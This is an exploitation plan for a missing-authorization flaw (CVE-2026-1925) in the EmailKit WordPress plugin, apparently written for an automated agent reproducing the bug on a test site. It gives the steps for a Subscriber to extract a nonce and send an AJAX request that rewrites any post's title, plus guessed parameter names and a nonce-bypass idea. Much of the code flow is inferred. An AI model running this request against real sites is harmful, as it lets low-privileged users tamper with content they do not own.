Vulnerability Analysis: CVE-2026-1925 (EmailKit – Email Customizer for WooCommerce & WP)

1. Vulnerability Summary

The EmailKit – Email Customizer for WooCommerce & WP plugin (versions <= 1.6.2) is vulnerable to unauthorized data modification due to a missing authorization check in the update_template_data function. While the function likely verifies a WordPress nonce to prevent CSRF, it fails to verify if the authenticated user has the necessary capabilities (e.g., manage_options or edit_posts) to modify post data. This allows any authenticated user, including those with Subscriber privileges, to change the title of any post, page, or custom post type on the site by providing its ID.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: emailkit_update_template_data (inferred prefix based on plugin slug) or update_template_data.
• Vulnerable Parameter: post_id (the ID of the target post) and title (the new title).
• Authentication: Subscriber level or higher is required.
• Preconditions: A valid nonce for the update_template_data action must be obtained.

3. Code Flow (Inferred)

1. Entry Point: An authenticated user sends a POST request to admin-ajax.php with the action emailkit_update_template_data.
2. Hook Registration: The plugin registers the action via:
   add_action('wp_ajax_emailkit_update_template_data', array($this, 'update_template_data'));
3. Vulnerable Function: The update_template_data function is called.
4. Missing Check: The function likely calls check_ajax_referer('emailkit_nonce', 'security') but fails to call current_user_can('manage_options').
5. Sink: The function retrieves post_id and title from the $_POST array and calls wp_update_post(array('ID' => $post_id, 'post_title' => $title)).
6. Impact: The title of the specified post_id is updated in the database regardless of the user's permissions.

4. Nonce Acquisition Strategy

To exploit this as a Subscriber, we must find where the plugin exposes the nonce.

1. Login as Subscriber: Authenticate as a low-privileged user.
2. Locate Nonce: The plugin likely uses wp_localize_script to pass a nonce to its template editor. Even if a Subscriber cannot access the EmailKit dashboard menu, the script might be enqueued on all admin pages (common in many plugins) or the nonce might be accessible on the frontend if EmailKit components are used.
3. Check Admin Pages: Navigate to /wp-admin/profile.php.
4. Browser Evaluation: Use the browser_eval tool to check for common EmailKit global objects.
   • Inferred JS Variable: window.emailkit_config?.nonce or window.emailkit_obj?.security.
   • Action String: Likely emailkit_nonce or emailkit-customizer-nonce.

5. Exploitation Strategy

Step 1: Setup

• Identify a target post ID (e.g., Post ID 1, usually "Hello world!").
• Create a Subscriber user account.

Step 2: Nonce Extraction

• Log in to the WordPress dashboard as the Subscriber.
• Navigate to /wp-admin/profile.php.
• Execute JS to find the nonce:

  // Search for any object containing "nonce" or "security" related to emailkit
  Object.keys(window).filter(key => key.toLowerCase().includes('emailkit'))
  

• Capture the value (e.g., emailkit_obj.nonce).

Step 3: Send Exploit Request

Use the http_request tool to send the unauthorized update request.

• Method: POST
• URL: http://[TARGET]/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body Parameters:
  • action: emailkit_update_template_data (verify via grep)
  • security: [EXTRACTED_NONCE]
  • post_id: 1 (Target Post ID)
  • title: VULNERABLE-TITLE-MODIFIED

Step 4: Verification

• Check if the post title has changed using WP-CLI.

6. Test Data Setup

1. Target Post: Ensure a post exists with ID 1.
   • wp post create --post_title="Original Admin Post" --post_status=publish
2. Attacker User: Create a Subscriber user.
   • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
3. Plugin Activation: Ensure emailkit is active.

7. Expected Results

• Response: The server should return a JSON success response, e.g., {"success":true} or 1.
• Database State: The post_title column in the wp_posts table for the target ID should reflect the new title.

8. Verification Steps

1. Check Title via WP-CLI:

   wp post get 1 --field=post_title
   

   If the output is VULNERABLE-TITLE-MODIFIED, the exploit is successful.
2. Check via UI:
   Navigate to the site's homepage or the specific post URL to see the modified title.

9. Alternative Approaches

• Parameter Names: If post_id or title doesn't work, try id, template_id, name, or template_name (as the function name mentions "template_data").
• REST API: Check if the plugin registers a REST route emailkit/v1/update-template which might share the same vulnerable logic.
• Action Name: If emailkit_update_template_data is incorrect, grep the plugin directory:

  grep -rn "wp_ajax_" wp-content/plugins/emailkit/ | grep "update_template_data"
  

• Nonce Check Bypass: If check_ajax_referer is used with the third parameter set to false, the nonce check might be entirely skippable if the result isn't validated.